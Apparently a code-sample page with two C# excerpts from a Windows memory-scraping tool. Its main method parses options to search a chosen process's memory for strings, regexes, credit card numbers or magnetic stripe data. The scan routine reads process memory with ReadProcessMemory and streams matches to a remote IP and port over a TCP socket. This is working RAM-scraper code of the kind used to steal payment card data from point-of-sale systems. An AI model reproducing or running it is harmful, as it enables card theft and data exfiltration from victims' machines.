Beispiel #1
0
        // main method
        static int Main(string[] args)
        {
            banner();

            if (args.Length == 0)
            {
                usage();
                return 0;
            }

            // display process list
            if (args[0].ToString().Equals("-proclist"))
            {
                System.Console.WriteLine("\nPID\tProcess Name");
                System.Console.WriteLine("---------------------");
                foreach (Process p in Process.GetProcesses())
                {
                    System.Console.WriteLine(p.Id + "\t" + p.ProcessName);
                }
                return 0;
            }

            CliArgs myargs = new CliArgs();

            if (args[0].ToString().Equals("-string") && args.Length >= 5)
            {
                myargs.setRunType("string");
                // sending results over a socket
                if (args[1].ToString().Equals("-s"))
                {
                    if (args.Length >= 8)
                    {
                        myargs.setMode("socket");
                        myargs.setPID(args[2]);
                        myargs.setIPaddr(args[3]);
                        myargs.setPortnum(args[4]);
                        myargs.setDelay(args[5]);
                        myargs.setPrePostFix(args[6]);
                        myargs.setSearchTerm(args, 7);
                        Console.WriteLine("Starting search for \"{0}\" on procid {1} sending output to {2}:{3} with delay of {4} and width of {5}", myargs.searchterm, myargs.pid.ToString(), myargs.ipaddr, myargs.portnum.ToString(), myargs.delay.ToString(), myargs.prepostfix.ToString());
                    }
                }
                if (args[1].ToString().Equals("-f"))
                {
                    if (args.Length >= 6)
                    {
                        myargs.setMode("file");
                        myargs.setPID(args[2]);
                        myargs.setFilename(args[3]);
                        myargs.setDelay(args[4]);
                        myargs.setPrePostFix(args[5]);
                        myargs.setSearchTerm(args, 6);
                        Console.WriteLine("Starting search for \"{0}\" on procid {1} sending output to file {2} with delay of {3} and width of {4}", myargs.searchterm, myargs.pid.ToString(), myargs.filename, myargs.delay.ToString(), myargs.prepostfix.ToString());
                    }
                }
                if (args[1].ToString().Equals("-o"))
                {
                    if (args.Length >= 5)
                    {
                        myargs.setMode("stdio");
                        myargs.setPID(args[2]);
                        myargs.setDelay(args[3]);
                        myargs.setPrePostFix(args[4]);
                        myargs.setSearchTerm(args, 5);
                        Console.WriteLine("Starting search for \"{0}\" on procid {1} sending output to stdio with delay of {2} and width of {3}", myargs.searchterm, myargs.pid.ToString(), myargs.delay.ToString(), myargs.prepostfix.ToString());
                    }
                }
            }

            if (args[0].ToString().Equals("-regex") && args.Length >= 5)
            {
                myargs.setRunType("regex");
                // sending results over a socket
                if (args[1].ToString().Equals("-s"))
                {
                    if (args.Length >= 8)
                    {
                        myargs.setMode("socket");
                        myargs.setPID(args[2]);
                        myargs.setIPaddr(args[3]);
                        myargs.setPortnum(args[4]);
                        myargs.setDelay(args[5]);
                        myargs.setPrePostFix(args[6]);
                        myargs.setSearchTerm(args, 7);
                        Console.WriteLine("Starting search for \"{0}\" on procid {1} sending output to {2}:{3} with delay of {4} and width of {5}", myargs.searchterm, myargs.pid.ToString(), myargs.ipaddr, myargs.portnum.ToString(), myargs.delay.ToString(), myargs.prepostfix.ToString());
                    }
                }
                if (args[1].ToString().Equals("-f"))
                {
                    if (args.Length >= 6)
                    {
                        myargs.setMode("file");
                        myargs.setPID(args[2]);
                        myargs.setFilename(args[3]);
                        myargs.setDelay(args[4]);
                        myargs.setPrePostFix(args[5]);
                        myargs.setSearchTerm(args, 6);
                        Console.WriteLine("Starting search for \"{0}\" on procid {1} sending output to file {2} with delay of {3} and width of {4}", myargs.searchterm, myargs.pid.ToString(), myargs.filename, myargs.delay.ToString(), myargs.prepostfix.ToString());
                    }
                }
                if (args[1].ToString().Equals("-o"))
                {
                    if (args.Length >= 5)
                    {
                        myargs.setMode("stdio");
                        myargs.setPID(args[2]);
                        myargs.setDelay(args[3]);
                        myargs.setPrePostFix(args[4]);
                        myargs.setSearchTerm(args, 5);
                        Console.WriteLine("Starting search for \"{0}\" on procid {1} sending output to stdio with delay of {2} and width of {3}", myargs.searchterm, myargs.pid.ToString(), myargs.delay.ToString(), myargs.prepostfix.ToString());
                    }
                }
            }

            if (args[0].ToString().Equals("-ccdata") && args.Length >= 3)
            {
                myargs.setRunType("ccdata");
                // sending results over a socket
                if (args[1].ToString().Equals("-s"))
                {
                    if (args.Length >= 6)
                    {
                        myargs.setMode("socket");
                        myargs.setPID(args[2]);
                        myargs.setIPaddr(args[3]);
                        myargs.setPortnum(args[4]);
                        myargs.setDelay(args[5]);
                        Console.WriteLine("Starting search for credit card numbers on procid {0} sending output to {1}:{2} with delay of {4}", myargs.pid.ToString(), myargs.ipaddr, myargs.portnum.ToString(), myargs.delay.ToString());
                    }
                }
                if (args[1].ToString().Equals("-f"))
                {
                    if (args.Length >= 5)
                    {
                        myargs.setMode("file");
                        myargs.setPID(args[2]);
                        myargs.setFilename(args[3]);
                        myargs.setDelay(args[4]);
                        Console.WriteLine("Starting search for credit card numbers on procid {0} sending output to file {1} with delay of {2}", myargs.pid.ToString(), myargs.filename, myargs.delay.ToString());
                    }
                }
                if (args[1].ToString().Equals("-o"))
                {
                    if (args.Length >= 4)
                    {
                        myargs.setMode("stdio");
                        myargs.setPID(args[2]);
                        myargs.setDelay(args[3]);
                        Console.WriteLine("Starting search for credit card numbers on procid {0} sending output to stdio with delay of {1}", myargs.pid.ToString(), myargs.delay.ToString());
                    }
                }
            }

            if (args[0].ToString().Equals("-msdata") && args.Length >= 3)
            {
                myargs.setRunType("msdata");
                // sending results over a socket
                if (args[1].ToString().Equals("-s"))
                {
                    if (args.Length >= 6)
                    {
                        myargs.setMode("socket");
                        myargs.setPID(args[2]);
                        myargs.setIPaddr(args[3]);
                        myargs.setPortnum(args[4]);
                        myargs.setDelay(args[5]);
                        Console.WriteLine("Starting search for magnetic stripe data on procid {0} sending output to {1}:{2} with delay of {4}", myargs.pid.ToString(), myargs.ipaddr, myargs.portnum.ToString(), myargs.delay.ToString());
                    }
                }
                if (args[1].ToString().Equals("-f"))
                {
                    if (args.Length >= 5)
                    {
                        myargs.setMode("file");
                        myargs.setPID(args[2]);
                        myargs.setFilename(args[3]);
                        myargs.setDelay(args[4]);
                        Console.WriteLine("Starting search for magnetic stripe data on procid {0} sending output to file {1} with delay of {2}", myargs.pid.ToString(), myargs.filename, myargs.delay.ToString());
                    }
                }
                if (args[1].ToString().Equals("-o"))
                {
                    if (args.Length >= 4)
                    {
                        myargs.setMode("stdio");
                        myargs.setPID(args[2]);
                        myargs.setDelay(args[3]);
                        Console.WriteLine("Starting search for magnetic stripe data on procid {0} sending output to stdio with delay of {1}", myargs.pid.ToString(), myargs.delay.ToString());
                    }
                }
            }

            // validate arguments, if good then off we go!
            if (myargs.isValid())
            {
                process = Process.GetProcessById(myargs.pid);
                switch (myargs.runType)
                {
                    case "string":
                        memScanString(myargs);
                        break;
                    case "regex":
                        memScanRegex(myargs);
                        break;
                    case "ccdata":
                        memScanCCData(myargs);
                        break;
                    case "msdata":
                        memScanMSData(myargs);
                        break;
                    default:
                        Console.WriteLine("Unrecognised run mode.");
                        usage();
                        return 0;
                }
            }
            else
            {
                Console.WriteLine("Error in arguments. Check and try again.");
                usage();
            }
            return 1;
        }
Beispiel #2
0
        // string search run mode
        public static void memScanString(CliArgs myargs)
        {
            IPAddress ipAddress;
            IPEndPoint remoteIP;
            Socket sender = null;
            System.IO.StreamWriter file = null;

            // writing output to socket
            if (myargs.mode.Equals("socket"))
            {
                try
                {
                    ipAddress = IPAddress.Parse(myargs.ipaddr);
                    remoteIP = new IPEndPoint(ipAddress, myargs.portnum);
                    sender = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
                    sender.Connect(remoteIP);
                    Console.WriteLine("Socket connected to {0}", sender.RemoteEndPoint.ToString());
                }
                catch (SocketException se)
                {
                    Console.WriteLine("SocketException : {0}", se.ToString());
                }
            }

            // writing output to file
            if (myargs.mode.Equals("file"))
            {
                file = new System.IO.StreamWriter(myargs.filename);
                file.AutoFlush = true;
            }

            // to infinity, and beyond!
            while (true)
            {
                // getting minimum & maximum address
                SYSTEM_INFO sys_info = new SYSTEM_INFO();
                GetSystemInfo(out sys_info);

                IntPtr proc_min_address = sys_info.minimumApplicationAddress;
                IntPtr proc_max_address = sys_info.maximumApplicationAddress;

                // saving the values as long ints to avoid  lot of casts later
                long proc_min_address_l = (long)proc_min_address;
                long proc_max_address_l = (long)proc_max_address;

                String toSend = "";

                // opening the process with desired access level
                IntPtr processHandle = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_WM_READ, false, process.Id);

                // this will store any information we get from VirtualQueryEx()
                MEMORY_BASIC_INFORMATION mem_basic_info = new MEMORY_BASIC_INFORMATION();

                // number of bytes read with ReadProcessMemory
                int bytesRead = 0;

                // for some efficiencies, pre-compute prepostfix values
                int postfix = myargs.searchterm.Length + (myargs.prepostfix * 2);

                while (proc_min_address_l < proc_max_address_l)
                {
                    // 28 = sizeof(MEMORY_BASIC_INFORMATION)
                    VirtualQueryEx(processHandle, proc_min_address, out mem_basic_info, 28);

                    // if this memory chunk is accessible
                    if (mem_basic_info.Protect == PAGE_READWRITE && mem_basic_info.State == MEM_COMMIT)
                    {
                        byte[] buffer = new byte[mem_basic_info.RegionSize];

                        // read everything in the buffer above
                        ReadProcessMemory((int)processHandle, mem_basic_info.BaseAddress, buffer, mem_basic_info.RegionSize, ref bytesRead);

                        String memStringASCII = Encoding.ASCII.GetString(buffer);
                        String memStringUNICODE = Encoding.Unicode.GetString(buffer);

                        // does the search terms exist in this chunk in ASCII form?
                        if (memStringASCII.Contains(myargs.searchterm))
                        {
                            int idex = 0;
                            while ((idex = memStringASCII.IndexOf(myargs.searchterm, idex)) != -1)
                            {
                                toSend += "0x" + (mem_basic_info.BaseAddress + idex).ToString() + ":A:" + memStringASCII.Substring(idex - myargs.prepostfix, postfix) + "\n";

                                if (myargs.mode.Equals("socket"))
                                {
                                    byte[] msg = Encoding.ASCII.GetBytes(toSend);
                                    int bytesSent = sender.Send(msg);
                                }
                                if (myargs.mode.Equals("file"))
                                {
                                    file.WriteLine(toSend);
                                }
                                if (myargs.mode.Equals("stdio"))
                                {
                                    Console.WriteLine(toSend);
                                }
                                // enter sandman
                                System.Threading.Thread.Sleep(myargs.delay);
                                toSend = "";
                                idex++;
                            }
                        }

                        // does the search terms exist in this chunk in UNICODE form?
                        if (memStringUNICODE.Contains(myargs.searchterm))
                        {

                            int idex = 0;
                            while ((idex = memStringUNICODE.IndexOf(myargs.searchterm, idex)) != -1)
                            {
                                toSend += "0x" + (mem_basic_info.BaseAddress + idex).ToString() + ":U:" + memStringUNICODE.Substring(idex - myargs.prepostfix, postfix) + "\n";

                                if (myargs.mode.Equals("socket"))
                                {
                                    byte[] msg = Encoding.ASCII.GetBytes(toSend);
                                    int bytesSent = sender.Send(msg);
                                }
                                if (myargs.mode.Equals("file"))
                                {
                                    file.WriteLine(toSend);
                                }
                                if (myargs.mode.Equals("stdio"))
                                {
                                    Console.WriteLine(toSend);
                                }
                                // enter sandman
                                System.Threading.Thread.Sleep(myargs.delay);
                                toSend = "";
                                idex++;
                            }
                        }
                    }

                    // truffle shuffle - moving on chunk
                    proc_min_address_l += mem_basic_info.RegionSize;
                    proc_min_address = new IntPtr(proc_min_address_l);
                }
            }
            // ask Turing if we'll ever get here...
            sender.Shutdown(SocketShutdown.Both);
            sender.Close();
            if (myargs.mode.Equals("file"))
            {
                file.Close();
            }
        }